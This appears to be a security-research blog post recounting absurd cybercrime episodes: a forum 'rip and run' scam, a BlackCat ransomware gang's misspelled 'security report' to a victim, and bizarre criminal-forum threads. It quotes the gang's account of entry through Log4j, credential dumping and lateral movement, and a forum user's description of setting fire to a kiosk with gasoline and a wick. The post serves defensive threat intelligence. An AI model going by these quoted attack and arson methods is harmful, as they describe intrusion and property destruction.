Laughter in the dark: Tales of absurdity from the cyber frontline and what they taught us
Figure 4: The BreachForums administrator provides some reassurance
In a plot twist that will surprise no one, Fitzpatrick removed the scammer’s permissions and banned him, all without paying – making this a classic example of a ‘rip and run’ scam.
The serious side
It’s undoubtedly entertaining to watch threat actors attacking each other instead of organizations. But there are two key practical learning points here:
- Unintended fallout. While scammers will sometimes set up fake marketplaces and sites with the intention of deceiving threat actors, it’s possible that others – such as researchers, analysts, journalists, and law enforcement personnel – may also fall victim to these schemes. That may involve paying to access ‘closed’ forums which are actually scam sites, or giving away credentials on fake marketplaces. Learning about the different types of scams and how they work may help such groups from becoming victims
- A rich source of intelligence. Many criminal marketplaces and forums have dedicated sections for ‘arbitration,’ where users can bring complaints and allegations to moderators. As we explained in Part 4 of this series, these sections are often a rich source of intelligence, because many threat actors are so indignant about being scammed that they will happily post screenshots, chat logs, and other details as proof when opening an arbitration case. In the examples we looked at, we found cryptocurrency addresses, usernames, transaction IDs, email addresses, IP addresses, victim names, source code, screenshots of desktops (which included open browser tabs, chats, conversations, weather conditions, and timezones), and other information.
One hat, two hat, Black Cat, blue hat?
We’ve noted in previous research that some ransomware groups like to refer to themselves as ‘pentesters’, to lend themselves an air of undeserved legitimacy – with some even offering ‘security reports’ to their victims (after getting paid, naturally). Our IR team observed a particularly egregious example of this practice in 2022.
An organization in the US was targeted in an ALPHV/BlackCat ransomware attack. There was nothing particularly unusual about the attack itself, and, having negotiated a significant discount, the organization paid the ransom.
Along with the decryptor, the organization also received a ‘security report’ from the threat actor, in the form of a short text file complete with spelling mistakes, grammatical errors, and profanity. (We suspect the report would not pass muster with any self-respecting pentesting outfit – no screenshots, diagrams, or professionally-produced PDFs here.)
In the ‘report,’ the threat actor described the vulnerability they used to obtain initial access:
These points should answer most questions, if you want to know anything else or have problems with decryption, let us know. 1. You had an old critical Log4j vulnerability not fixed on Horizon, this is how we were able to get in initially, it was a bulk scanning, not like we were targetting [sic] you intentionally.
The threat actor went on to (very briefly) explain how they moved through the network, and provided some basic, and not necessarily practical, security recommendations:
2. Once inside your horizon VM, we dumped credentials, got some Domain admin, cracked the hash and [were] able to move laterally. Its [sic] absolutely [sic] madness to have 3k computers on the same domain, you should split all the machines between different domains, like …ONLINE, FINANCIAL.. you get the idea, so if one domain is infilitrated [sic] somehow not all the infrastructure will be compromised. Also you should routinely review sensitive information like passports, bank accounts and so on and have them on a different domain, even more secured. Try search on fileservers for the word passport, driving license, background… put all those files on [sic] a safe.
The threat actor proceeded to advise the victim not to “use any massively used backup software…Cant [sic] go deeper on that.” We assess that the threat actor was admitting here that they’re familiar with popular backup applications and know how to extract data from them.
4. Once network was scanned, we went for the backup servers which you should have on a different domain under 5 different keys and 2FAs. Dont [sic] use any massively used backup software, its [sic] a goldmine for us. Cant [sic] go deeper than that, just don’t [sic] use any of the big names.
Interestingly – and we mention this only because it’s fascinating to get a threat actor’s opinion on the subject – the threat actor then provided further security advice on monitoring logs, noting that “sophos is a good AV.”
5. At this point it should be clear to you that having a database of passwords for all services and services on the local network, it took us a few days to verify the credentials and make a plan of attack. We have to say sophos is a good AV, however no one monitors the logs on your network or at least they dont [sic] do on weekends. […] 8. General Recommendation. 8.1. Install a hard-to-override antivirus, Sophos Obligatory 2FA function to be enabled on the input, at least for domain admins. The most expensive is not always the best one, EDRs or MSPs if they are not being watched the logs 24/7 [sic] are useless and no MSP does that even if they tell you otherwise.
The threat actor also recommended the use of two-factor authentication, and suggested that the organization “install sophos on servers which are DC, fileservers, backups or critical and monitor…logs each 24hrs.”
The threat actor ended their report by saying, apparently without any trace of irony: “Its [sic] been an honor working with you” and concluded with a bizarre exhortation to “keep up the good maple syrup and trucker protests” – suggesting that they mistakenly believed the victim was based in Canada.
The serious side
As we noted in a 2023 article exploring the relationship between ransomware groups and the media, ransomware is becoming increasingly professionalized and commoditized. One symptom of this is ransomware groups attempting to paint a picture of themselves as legitimate security professionals and outfits, by publishing ‘press releases’ and ‘security reports’ (as in the BlackCat case described above).
This kind of rebranding is a tactic borrowed from legitimate industries, and it’s perhaps not unreasonable to speculate that ransomware groups may do this more in the future – perhaps as a recruitment tool, or to try and alleviate negative coverage from the media and attention from law enforcement.
Practically speaking, so-called ‘security reports’ from ransomware groups may contain valuable information about how the threat actor gained access and pivoted through the network – particularly if it can be verified independently, as our IR team did in this case study. This is potentially very useful to know when it comes to recovery and remediation.
We would, however, advise that any organizations in possession of such reports do verify the information, and take any security recommendations from threat actors with a generous pinch of salt before acting on them.
Ice cream, e-liquid, Russian convicts, and Ancient Egypt
In our 2025 five-part series on what cybercriminals do with their ill-gotten gains – based on discussions in obscure areas of criminal forums – we found posts suggesting threat actors are involved/interested in fraud, theft, money laundering, shell companies, stolen and counterfeit goods, counterfeit currency, pornography, sex work, stocks and shares, pyramid schemes, gold, diamonds, insider trading, construction, real estate, drugs, offshore banking, hiring money mules (people hired by launderers to physically or virtually transport/transfer money) and smurfs (people hired to conduct small transactions in order to launder a larger amount), tax evasion, affiliate advertising and traffic generation, restaurants, education, wholesaling, tobacco and vaping, pharmaceuticals, gambling – and, believe it or not, cybersecurity companies and services.
But perhaps the most bizarre discussion we saw was a thread on a Russian-language cybercrime forum. It started innocently enough, with a user asking if it would be feasible to open an ice cream stall with 200,000 roubles (around $2,400 as of this writing).
Without any prompting, another user – who described themselves as “the master of the ice cream business” – confessed to arson.
In a very detailed post, they described setting fire to a competitor’s ice cream kiosk in the early 2000s, apparently reassured by the fact that “the statute of limitations…has already passed.” They went on to explain exactly what they used to commit the crime:
“…a crowbar, a plastic bottle with gasoline, a wick on an extension cord, matches…I noticed a vertical hollow pipe sticking out of the roof [of the kiosk]…I poured the whole bottle into it, stuffed a wick soaked in gasoline, and set it on fire…I never saw that business or that stall again.”
That threat actors are involved in both legitimate and criminal business activities came as no shock to us (although we didn’t expect there to be such scale and diversity). We were, however, a little taken aback to discover that the ice cream business can be so cut-throat (although any Scottish readers may be less surprised).
If ice cream arson won the title for ‘Weirdest Finding’, there were several other worthy contenders:
- A proposal to outsource software development, hardware manufacturing, and cybersecurity to Russian prison inmates. Some threat actors suggested that this could work in some cases (e.g., development of crude malware), while many others were sceptical and – perhaps surprisingly, given the proliferation on cybercrime forums of fenya, a dialect popular in Russian prisons – somewhat disparaging about the abilities of prisoners
- A threat actor who shared details of a controversial moneymaking scheme: selling e-liquid to schoolchildren. Another user took them to task (“I’m reading this as a parent…don’t you fucking have children?”). To the amusement of other threat actors in the thread, the two began a good old-fashioned flame war (“In the stores there is alcohol, cigarettes…maybe you should go to the mommies’ forum?”; “LEAVE YOUR ADDRESS…WE’LL COME NOW, WHEREVER YOU ARE”; “I don’t give a fuck about other people’s children”, and so on)
- In a case more alarming than amusing, we saw one threat actor advise others to invest in a prominent cybersecurity vendor, noting that the vendor may soon be acquiring another company. Irony aside, this raises the troubling possibility that threat actors could – if they’re not already – be shareholders (and therefore able to vote on corporate actions, receive dividends, etc.) of a company that tracks and disrupts threat actors
- But runner-up to the ice cream arson confession surely went to an enterprising threat actor who claimed to have “found some pharaonic and coptic monuments [i.e., Ancient Egyptian artifacts]…only two people know about its location. We want to sell it, but we don’t know how…to handle the shipment and the right place to sell in an auction (black market).” The user uploaded two photos of what appeared to be a sarcophagus lying on bubble wrap. To our surprise, some users expressed an interest in purchasing the ‘artifacts,’ with one even offering to put the sellers in touch with a buyer “who will buy it immediately after his expert confirms.”
About Author
